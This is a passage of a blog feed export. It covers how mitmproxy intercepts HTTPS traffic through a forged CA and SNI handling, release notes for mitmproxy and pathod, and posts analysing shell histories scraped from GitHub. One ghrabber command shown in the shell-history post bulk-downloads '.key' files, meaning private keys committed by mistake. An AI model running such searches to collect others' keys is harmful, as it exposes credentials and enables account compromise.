href=\"http:\/\/en.wikipedia.org\/wiki\/Certificate_authority\">Certificate\nAuthority<\/a> system is\ndesigned to prevent exactly this attack, by allowing a trusted third-party to\ncryptographically sign a server's SSL certificates to verify that they are\nlegit. If this signature doesn't match or is from a non-trusted party, a secure\nclient will simply drop the connection and refuse to proceed. Despite the many\nshortcomings of the CA system as it exists today, this is usually fatal to\nattempts to MITM an SSL connection for analysis. Our answer to this conundrum\nis to become a trusted Certificate Authority ourselves. Mitmproxy includes a\nfull CA implementation that generates interception certificates on the fly. To\nget the client to trust these certificates, we <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/ssl.html\">register mitmproxy as a trusted\nCA with the device manually<\/a>.<\/p>\n<h3 id=\"complication-1-what-s-the-remote-hostname\">Complication 1: What's the remote hostname?<\/h3>\n<p>To proceed with this plan, we need to know the domain name to use in the\ninterception certificate - the client will verify that the certificate is for\nthe domain it's connecting to, and abort if this is not the case. At first\nblush, it seems that the CONNECT request above gives us all we need - in this\nexample, both of these values are \"example.com\".  But what if the client had\ninitiated the connection as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>CONNECT 10.1.1.1:443 HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>Using the IP address is perfectly legitimate because it gives us enough\ninformation to initiate the pipe, even though it doesn't reveal the remote\nhostname.<\/p>\n<p>Mitmproxy has a cunning mechanism that smooths this over - <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/features\/upstreamcerts.html\">upstream\ncertificate sniffing<\/a>. As\nsoon as we see the CONNECT request, we pause the client part of the\nconversation, and initiate a simultaneous connection to the server. We complete\nthe SSL handshake with the server, and inspect the certificates it used. Now,\nwe use the Common Name in the upstream SSL certificates to generate the dummy\ncertificate for the client. Voila, we have the correct hostname to present to\nthe client, even if it was never specified.<\/p>\n<h3 id=\"complication-2-subject-alternative-name\">Complication 2: Subject Alternative Name<\/h3>\n<p>Enter the next complication. Sometimes, the certificate Common Name is not, in\nfact, the hostname that the client is connecting to. This is because of the\noptional <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/SubjectAltName\">Subject Alternative\nName<\/a> field in the SSL certificate\nthat allows an arbitrary number of alternative domains to be specified. If the\nexpected domain matches any of these, the client will proceed, even though the\ndomain doesn't match the certificate Common Name. The answer here is simple:\nwhen extract the CN from the upstream cert, we also extract the SANs, and add\nthem to the generated dummy certificate.<\/p>\n<h3 id=\"complication-3-server-name-indication\">Complication 3: Server Name Indication<\/h3>\n<p>One of the big limitations of vanilla SSL is that each certificate requires its\nown IP address. This means that you couldn't do virtual hosting where multiple\ndomains with independent certificates share the same IP address. In a world\nwith a rapidly shrinking IPv4 address pool this is a problem, and we have a\nsolution in the form of the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Server_Name_Indication\">Server Name\nIndication<\/a> extension to\nthe SSL and TLS protocols. This lets the client specify the remote server name\nat the start of the SSL handshake, which then lets the server select the right\ncertificate to complete the process.<\/p>\n<p>SNI breaks our upstream certificate sniffing process, because when we connect\nwithout using SNI, we get served a default certificate that may have nothing to\ndo with the certificate expected by the client. The solution is another tricky\ncomplication to the client connection process. After the client connects, we\nallow the SSL handshake to continue until just <em>after<\/em> the SNI value has been\npassed to us. Now we can pause the conversation, and initiate an upstream\nconnection using the correct SNI value, which then serves us the correct\nupstream certificate, from which we can extract the expected CN and SANs.<\/p>\n<p>There's another wrinkle here. Due to a limitation of the SSL library mitmproxy\nuses, we can't detect that a connection <em>hasn't<\/em> sent an SNI request until it's\ntoo late for upstream certificate sniffing. In practice, we therefore make a\nvanilla SSL connection upstream to sniff non-SNI certificates, and then discard\nthe connection if the client sends an SNI notification. If you're watching your\ntraffic with a packet sniffer, you'll see two connections to the server when an\nSNI request is made, the first of which is immediately closed after the SSL\nhandshake. Luckily, this is almost never an issue in practice.<\/p>\n<h3 id=\"putting-it-all-together\">Putting it all together<\/h3>\n<p>Lets put all of this together into the complete explicitly proxied HTTPS flow.<\/p>\n<div class=\"media\">\n    <a href=\"explicit_https.png\">\n        <img src=\"explicit_https.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to mitmproxy, and issues an HTTP\n            CONNECT request.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>Mitmproxy responds with a 200 Connection Established, as if it\n            has set up the CONNECT pipe.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>The client believes it's talking to the remote server, and\n            initiates the SSL connection. It uses SNI to indicate the hostname\n            it is connecting to.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>Mitmproxy connects to the server, and establishes an SSL\n            connection using the SNI hostname indicated by the client.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>5<\/b><\/td>\n            <td>The server responds with the matching SSL certificate, which\n            contains the CN and SAN values needed to generate the interception\n            certificate.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>6<\/b><\/td>\n            <td>Mitmproxy generates the interception cert, and continues the\n            client SSL handshake paused in step 3.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>The client sends the request over the established SSL\n            connection.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>Mitmproxy passes the request on to the server over the SSL\n            connection initiated in step 4.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"transparent-http\">Transparent HTTP<\/h2>\n<p>When a transparent proxy is used, the HTTP\/S connection is redirected into a\nproxy at the network layer, without any client configuration being required.\nThis makes transparent proxying ideal for those situations where you can't\nchange client behaviour - proxy-oblivious Android applications being a common\nexample.<\/p>\n<p>To achieve this, we need to introduce two extra components. The first is a\nredirection mechanism that transparently reroutes a TCP connection destined for\na server on the Internet to a listening proxy server. This usually takes the\nform of a firewall on the same host as the proxy server -\n<a rel=\"external\" href=\"http:\/\/www.netfilter.org\/\">iptables<\/a> on Linux or\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/PF_(firewall)\">pf<\/a> on OSX. Once the client has\ninitiated the connection, it makes a vanilla HTTP request, which might look\nsomething like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>GET \/index.html HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>Note that this request differs from the explicit proxy variation, in that it\nomits the scheme and hostname. How, then, do we know which upstream host to\nforward the request to? The routing mechanism that has performed the\nredirection keeps track of the original destination for us.  Each routing\nmechanism has a different way of exposing this data, so this introduces the\nsecond component required for working transparent proxying: a host module that\nknows how to retrieve the original destination address from the router. In\nmitmproxy, this takes the form of a built-in set of\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/mitmproxy\/tree\/master\/libmproxy\/platform\">modules<\/a>\nthat know how to talk to each platform's redirection mechanism.  Once we have\nthis information, the process is fairly straight-forward.<\/p>\n<div class=\"media\">\n    <a href=\"transparent.png\">\n        <img src=\"transparent.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to the server.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>The router redirects the connection to mitmproxy, which is\n            typically listening on a local port of the same host. Mitmproxy\n            then consults the routing mechanism to establish what the original\n            destination was.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>Now, we simply read the client's request...<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>... and forward it upstream.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"transparent-https\">Transparent HTTPS<\/h2>\n<p>The first step is to determine whether we should treat an incoming connection\nas HTTPS. The mechanism for doing this is simple - we use the routing mechanism\nto find out what the original destination port is. By default, we treat all\ntraffic destined for ports 443 and 8443 as SSL.<\/p>\n<p>From here, the process is a merger of the methods we've described for\ntransparently proxying HTTP, and explicitly proxying HTTPS. We use the routing\nmechanism to establish the upstream server address, and then proceed as for\nexplicit HTTPS connections to establish the CN and SANs, and cope with SNI.<\/p>\n<div class=\"media\">\n    <a href=\"transparent_https.png\">\n        <img src=\"transparent_https.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client makes a connection to the server.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>The router redirects the connection to mitmproxy, which is\n            typically listening on a local port of the same host. Mitmproxy\n            then consults the routing mechanism to establish what the original\n            destination was.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>3<\/b><\/td>\n            <td>The client believes it's talking to the remote server, and\n            initiates the SSL connection. It uses SNI to indicate the hostname\n            it is connecting to.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>4<\/b><\/td>\n            <td>Mitmproxy connects to the server, and establishes an SSL\n            connection using the SNI hostname indicated by the client.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>5<\/b><\/td>\n            <td>The server responds with the matching SSL certificate, which\n            contains the CN and SAN values needed to generate the interception\n            certificate.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>6<\/b><\/td>\n            <td>Mitmproxy generates the interception cert, and continues the\n            client SSL handshake paused in step 3.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>The client sends the request over the established SSL\n            connection.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>7<\/b><\/td>\n            <td>Mitmproxy passes the request on to the server over the SSL\n            connection initiated in step 4.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<div class=\"footnote-definition\" id=\"ssl\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>I use \"SSL\" to refer to both SSL and TLS in the generic sense, unless otherwise specified.<\/p>\n<\/div>\n"},{"title":"pathod 0.9","published":"2013-05-16T00:00:00+00:00","updated":"2013-05-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_9\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_9\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod 0.9<\/a>, my toolset for crafting\nmalicious and interesting HTTP traffic. Apart from the usual range of stability\nimprovements and bugfixes, this release introduces a major new set of features:\nproxy support. <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">Pathoc<\/a>, the client, has sprouted\nsupport for vanilla proxy connections, and is also able to tunnel through\nproxies using CONNECT. <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathod\">Pathod<\/a>, the server, will\nnow respond to proxy requests as well as straight HTTP, and will treat CONNECT\nrequests as SSL with on-the-fly generation of dummy certificates.<\/p>\n<p>The Pathod changes in particular open a whole new range of possibilities for\nfuzzing and other mischief. Any client with proxy support can be directed at\nPathod, which can then impersonate the upstream server and return the creatively\nmalicious response of your choice.<\/p>\n<p>There have also been some organizational changes. This is the first release\nbased on <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/netlib\">netlib<\/a>, the gonzo networking\nlibrary pathod now shares with <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. Over the next\nwhile, pathod and mitmproxy will move closer together. As a sign of this, the\nmajor version numbers between these projects are now synchronized.<\/p>\n"},{"title":"mitmproxy 0.9","published":"2013-05-15T00:00:00+00:00","updated":"2013-05-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_9.png\">\n        <img src=\"mitmproxy_0_9.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.9<\/a>. This\nis a major release, with huge improvements to mitmproxy pretty much across the\nboard. So much has happened in the year since the last release that it's\ndifficult to pick out the headlines. Mitmproxy is now faster, more scalable, and\nworks in more tricky corner cases than ever before. Full transparent mode\nsupport has landed for both Linux and OSX. Content decoding is much nicer, with\na slew of new targets like\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Action_Message_Format\">AMF<\/a> and <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/protobuf\/\">Protocol\nBuffers<\/a>. We now have a WSGI container that\nallows you to host web apps right in the proxy. In addition to this, there is a\nmyriad of new features, bugfixes and other small improvements.<\/p>\n<p>There are also changes afoot in the project itself. As a first step, I've moved\nmitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier\nfor people to use the project in more contexts. Keep an eye out for more changes\nalong these lines soon, geared to broadening participation in the project.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Upstream certs mode is now the default.<\/li>\n<li>Add a WSGI container that lets you host in-proxy web applications.<\/li>\n<li>Full transparent proxy support for Linux and OSX.<\/li>\n<li>Introduce netlib, a common codebase for <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/netlib\">mitmproxy and\npathod<\/a>.<\/li>\n<li>Full support for SNI.<\/li>\n<li>Color palettes for mitmproxy, tailored for light and dark terminal\nbackgrounds.<\/li>\n<li>Stream flows to file as responses arrive with the \"W\" shortcut in\nmitmproxy.<\/li>\n<li>Extend the filter language, including ~d domain match operator, ~a to\nmatch asset flows (js, images, css).<\/li>\n<li>Follow mode in mitmproxy (\"F\" shortcut) to \"tail\" flows as they arrive.<\/li>\n<li>--dummy-certs option to specify and preserve the dummy certificate\ndirectory.<\/li>\n<li>Server replay from the current captured buffer.<\/li>\n<li>Huge improvements in content views. We now have viewers for AMF, HTML,\nJSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal\nand raw views.<\/li>\n<li>Add Set Headers, analogous to replacement hooks. Defines headers that are set\non flows, based on a matching pattern.<\/li>\n<li>A graphical editor for path components in mitmproxy.<\/li>\n<li>A small set of standard user-agent strings, which can be used easily in\nthe header editor.<\/li>\n<li>Proxy authentication to limit access to mitmproxy<\/li>\n<\/ul>\n"},{"title":"Google, destroyer of ecosystems","published":"2013-03-14T00:00:00+00:00","updated":"2013-03-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/rip-google-reader\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/rip-google-reader\/","content":"<p>Google has finally shut down a service I actually care about - <a rel=\"external\" href=\"http:\/\/googlereader.blogspot.co.nz\/2013\/03\/powering-down-google-reader.html\">Google Reader\nwill die a graceless, undignified death on July 1,\n2013<\/a>.\nThe only way Google could inconvenience me more would be to shut down search\nitself, and yet - I'm not angry that Google is shutting Reader down. I'm furious\nthat they ever entered the RSS game at all. Consider this quote from a\nTechCrunch <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2006\/01\/10\/searchfox-to-shut-down\/\">article in January\n2006<\/a>. Here, Michael\nArrington ends an article about the shutdown of a feed reader service with a\nstatement that seems truly bizarre today:<\/p>\n<blockquote>\n<p>The RSS reader space is becoming hyper competitive, with dozens of different\nchoices for readers.<\/p>\n<\/blockquote>\n<p>A hyper competitive space with dozens of choices? Reader made its first public\nappearance a couple of months before this, in October 2005. I remember this\nperiod well - it was a time of immense excitement, when RSS seemed to be the\nfuture, the news ecosystem was vibrant, and this thing called the blogosphere,\nfueled by peer subscription, was doubling in size every six months. It was into\nthis magic garden that Google wandered, like a giant toddler leaving destruction\nin its wake. Reader was undeniably a good product, but it's best quality was\nalso its worst: it was free. Subsidized by Google's immense search profits, it\nnever had to earn its keep, and its competitors started to die. Over time, the\n\"hyper competitive\" RSS reader market turned into a monoculture. Today, on the\neve of its shutdown, RSS more or less means \"Google Reader\" to a large fraction\nof readers, to the extent where even the best feed readers on IOS are just\nGoogle Reader clients<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>.<\/p>\n<p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href=\"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/\">already\nbelieve to be deeply ill<\/a>.\nGoogle Reader is not just a core part of my information diet - it's also the\nmost direct channel I have to readers of this blog. As of today, the Reader\nsubscriber count for <a rel=\"external\" href=\"http:\/\/corte.si\">corte.si<\/a> stands at about 3 times the\ntotal number of other subscribers combined. Some of these readers will migrate\nto other services and stay in touch, but many will inevitably abandon the idea\nof direct subscription to blogs entirely. In the next few months, tens of\nthousands of small blogs will lose direct contact with a large fraction of their\nreaders.<\/p>\n<p>The truth is this: Google destroyed the RSS feed reader ecosystem with a\nsubsidized product, stifling its competitors and killing innovation. It then\nneglected Google Reader itself for years, after it had effectively become the\nonly player. Today it does further damage by buggering up the already\nbeleaguered links between publishers and readers. It would have been better for\nthe Internet if Reader had never been at all.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Yes, I'm aware that there are a few hardy outliers still playing in this\nplace. My own logs show that their reach is insignificant, though, and when I\ntried to shift my subscriptions about a year ago, there was nothing as good as\nReader itself. Once <a rel=\"external\" href=\"http:\/\/www.newsblur.com\">NewsBlur's<\/a> servers have\nrecovered, I definitely plan to give it another shot.<\/p>\n<\/div>\n"},{"title":"Things I found on GitHub: aspell custom dictionary entries","published":"2013-02-26T00:00:00+00:00","updated":"2013-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/","content":"<p>I've been doing a series of posts looking at data gathered with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a>, a simple tool I wrote that lets\nyou grab files matching a search specification from GitHub. Last week, I looked\nat <a href=\"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/\">shell history<\/a> in the broad, and\nthen specifically at <a href=\"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/\">pipe chains<\/a>.\nToday, I move on to something different - custom <a rel=\"external\" href=\"http:\/\/aspell.net\/\">aspell<\/a>\ndictionaries. When aspell finds a word it doesn't recognize, the user is\nprompted to correct it, ignore it, or add it to a custom dictionary so that it\nwill be recognized as correct in future. These words are written to the user's\ncustom dictionary - a file named <strong>.aspell_en_pw<\/strong> that lives in the user's\nhome directory. It turns out that 30 people have checked aspell dictionaries\ninto GitHub, containing a total of 9501 custom words. The chart below shows the\ntop 50 words, with the X-axis showing the percentage of files the word appeared\nin.<\/p>\n<div class=\"media\">\n    <a href=\"aspell.png\">\n        <img src=\"aspell.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>There were a few requests for the raw data behind the previous two posts, so\nthis time round you can also <a href=\"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/.\/aspell-all.csv\">download a CSV file<\/a>\nwith the occurrence totals for each word in the dataset.<\/p>\n"},{"title":"Things I found on GitHub: pipe chains","published":"2013-02-22T00:00:00+00:00","updated":"2013-02-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/","content":"<p>Earlier this week I published <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a>, a\nsimple tool that lets you grab files matching an arbitrary search specification\nfrom GitHub. I used ghrabber to retrieve all the bash_history and zsh_history\nfiles accidentally checked in to repos, and took <a rel=\"external\" href=\"http:\/\/corte.si\/posts\/hacks\/github-shhistory\/index.html\">a light look at the dataset\nwith some simple\ngraphs<\/a>. In total, I\nobtained 234 shell history files with 165k individual command entries. This is a\nvery rare opportunity to \"shoulder-surf\", to actually see what people <em>do<\/em> at\nthe command prompt, and perhaps get some insights into how to improve things.<\/p>\n<p>Along those lines, today's post looks at pipe chains - that is, compound\ncommands that pipe the output of one command to another. The pipe operator lies\nat the core of the Unix command-line philosophy. The fact that we can easily\ncompose complex operations is the reason why we are able to write small tools\nthat \"do one thing well\" without losing generality. The shell history data on\nGithub can give us some real data about what people do with composed commands,\nand how they do it.<\/p>\n<div class=\"media\">\n    <a href=\"pipechains.png\">\n        <img src=\"pipechains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>It turns out that about 2% of all commands issued on the command-line use\npipes. The graph above shows the prevalence the most common pipe chains - that\nis, what percentage of the user in my sample used each chain. There's a lot of\nfascinating stuff we can read straight from this image.<\/p>\n<p>Starting at the top, the first thing we notice is how widely used the <strong>ps |\ngrep<\/strong> chain is. About 17% of users in my sample used this chain - given the\ntype of data we have, the real-world prevalence would surely be higher still.\nI've just been extolling the virtues of small tools and composability, but in\nthis case practicality should beat purity. I suggest that everyone should have\na command-alias similar to this in their shell configuration:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">alias<\/span><span> pg<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;ps aux | grep&quot;<\/span><\/span><\/code><\/pre>\n<p>I've added this to my .zshrc today, and I've already used it twice.<\/p>\n<p>Next up, we have the <strong>ls | grep<\/strong> pipes. The vast majority of uses here could\nactually be accomplished using the shell's filename generation mechanism.  This\nranges from simple redundancies like grepping for file extensions, to\nperforming quite complex matching operations that could be done using the\nshell's advanced glob operations. I'm guilty of this myself - I rarely use\nfeatures like recursive globbing, expansions using character ranges, case\ninsensitive globbing, and so forth. I've brushed up on <a rel=\"external\" href=\"http:\/\/linux.die.net\/man\/1\/zshexpn\">filename expansion for\nmy chosen shell<\/a>, and perhaps you should\ntoo.<\/p>\n<p>The last thing I want to point out is a pattern that's genuinely dangerous -\n<strong>curl | bash<\/strong>, along with its cousins <strong>curl | sh<\/strong> and <strong>wget | sh<\/strong>.\nUnfortunately, this has become the recommended installation pattern for some\ntool - the vast majority of invocations here are for <a rel=\"external\" href=\"https:\/\/rvm.io\/\">RVM<\/a> and\n<a rel=\"external\" href=\"http:\/\/yeoman.io\/\">Yeoman<\/a>. I don't think it's a good idea to pipe anything\nfrom the web straight into a local shell, but the situation is made\nparticularly dire by the fact that almost half of these invocations are either\nover plain HTTP or explicitly turn certificate validation off.<\/p>\n<p>I'll stop here, although there are interesting things to say about nearly every\nentry in the graph above. Next week, I'll move on from the shell history\nsample, look at some other juicy datasets extracted using ghrabber.<\/p>\n"},{"title":"Things I found on GitHub: shell history","published":"2013-02-19T00:00:00+00:00","updated":"2013-02-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/","content":"<p>Github recently introduced hugely <a rel=\"external\" href=\"https:\/\/github.com\/blog\/1381-a-whole-new-code-search\">improved code\nsearch<\/a>, one of those rare\nmoments when a service I use adds a feature that directly and measurably\nmeasurably improves my life. Predictably, there was soon a\n<a rel=\"external\" href=\"http:\/\/www.webmonkey.com\/2013\/01\/users-scramble-as-github-search-exposes-passwords-security-details\/\">flurry<\/a>\n<a rel=\"external\" href=\"http:\/\/www.scmagazine.com.au\/News\/330152,passwords-ssh-keys-exposed-on-github.aspx\">of<\/a>\n<a rel=\"external\" href=\"http:\/\/arstechnica.com\/security\/2013\/01\/psa-dont-upload-your-important-passwords-to-github\/\">breathless<\/a>\nstories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has\nsecurity or privacy implications, a law of the universe almost as solid as the\nsecond law of thermodynamics. We saw this with <a rel=\"external\" href=\"http:\/\/www.securityfocus.com\/news\/11417\">Google's own code\nsearch<\/a>, as well as <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Google_hacking\">Google\nproper<\/a>, Facebook's <a rel=\"external\" href=\"http:\/\/actualfacebookgraphsearches.tumblr.com\/\">Graph\nSearch<\/a> and even\n<a rel=\"external\" href=\"http:\/\/www.wired.com\/wiredenterprise\/2013\/02\/microsoft-bing-fights-botnets\/\">Bing<\/a>.\nA certain fraction of people will always make mistakes, and and any sufficiently\npowerful search will allow bad guys to find and take advantage of the outliers.<\/p>\n<p>After the dust had settled a bit I started wondering what else we could do with\nGithub's search - other than snookering schmucks who checked in their private\nkeys. I'm always enticed by data, and the combination of search and the ability\nto download raw checked-in files seemed like a promising avenue to explore. Lets\nsee what we can come up with.<\/p>\n<h2 id=\"ghrabber-grab-files-from-github\"><a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">ghrabber<\/a> - grab files from GitHub<\/h2>\n<p>First, some tooling. I've just released ghrabber, a simple tool that lets you\ngrab all files matching a search specification from GitHub. Here, for instance,\nis an obvious wheeze - fetching all files with the extension \".key\":<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;extension:key&quot;<\/span><\/span><\/code><\/pre>\n<p>Downloaded files are saved locally to files named <strong>user.repository<\/strong>. Existing\nfiles with the same name are skipped, which means that you can reasonably\nefficiently stop and resume a ghrab.<\/p>\n<h2 id=\"shell-history-files\">Shell history files<\/h2>\n<p>I've been having a lot of fun exploring Github with ghrabber. I'll return to\nthis in future posts - today I'll start with a quick illustration of what can\nbe done. One type of difficult-to-find information that is sometimes checked in\nto repos is shell history. Two simple ghrabber commands for the two most\npopular shells is all we need:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.bash_history&quot;<\/span><\/span><\/code><\/pre>\n<p>and<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.zsh_history&quot;<\/span><\/span><\/code><\/pre>\n<p>After cleaning the data a bit, I had 234 history files varying in length from 1\nline to just over 10 thousand, containing a total of 165k entries. I fed this\ninto <a rel=\"external\" href=\"http:\/\/pandas.pydata.org\/\">Pandas<\/a> for analysis, parsing each command\nusing a combination of hand-hacked heuristics and the built-in\n<a rel=\"external\" href=\"http:\/\/docs.python.org\/2\/library\/shlex.html\">shlex<\/a> module. The remainder of\nthis post is a light exploration of some approaches to this dataset, steering\nclear of the obvious and tediously well-covered security implications.<\/p>\n<div class=\"media\">\n    <a href=\"topcmds.png\">\n        <img src=\"topcmds.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>One way to slice the data is to look at the percentage of history files a given\ncommand appears in. This gives us a nice listing of the top commands by user\nprevalence, which you can see in the graph on the left above. On the right, I've\ntaken the same list of commands, and checked how many invocations are preceded\nby a <strong>man<\/strong> lookup for the command. This gives us an idea of which\ncommonly-used commands have difficult or unintuitive interfaces. It's\ninteresting that <strong>ln<\/strong> is right at the top of the list, considering how simple\nthe command syntax is. My theory is that everyone forgets the order of the\nsource and target files.<\/p>\n<div class=\"media\">\n    <a href=\"editors.png\">\n        <img src=\"editors.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"media\">\n    <a href=\"tmuxes.png\">\n        <img src=\"tmuxes.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Since we have a list of the most widely used commands, it's also trivial to do\nsilly popularity comparisons. Above is the obvious look at the state of the\neditor wars (vim is winning, folks), and a check on how\n<a rel=\"external\" href=\"http:\/\/tmux.sourceforge.net\/\">tmux<\/a> is doing in supplanting screen (the faster\nthe better).<\/p>\n<p><div class=\"media\">\n    <a href=\"args-ssh.png\">\n        <img src=\"args-ssh.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-mkdir.png\">\n        <img src=\"args-mkdir.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-rm.png\">\n        <img src=\"args-rm.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-ls.png\">\n        <img src=\"args-ls.png\"  \/>\n    <\/a>\n\n    \n<\/div><\/p>\n<p>Another interesting thing to do is to look at the most commonly used flags to\ncommands. I think having \"real data\" of command use may well guide us to design\nbetter command-line interfaces. I'd love to know the most common invocation\nflags for some of the tools I write.<\/p>\n<p>I'll stop there. The data pool in this case is very deep, and there are a huge\nrange of interesting bits of command-line ethnography that could be done. Stay\nposted for more in the coming weeks.<\/p>\n"},{"title":"The trouble with social news","published":"2013-01-24T00:00:00+00:00","updated":"2013-01-24T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/","content":"<p>There is something terribly awry with the social news ecosystem. This is a\nfeeling that's been growing on me over the last few years, and is the reason why\nI've cut both <a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a> and <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker\nNews<\/a> (who together constitute pretty much all of\n\"social news\") out of my information diet.  Although I've mulled over things in\nvarious conversations, I've never actually tried to 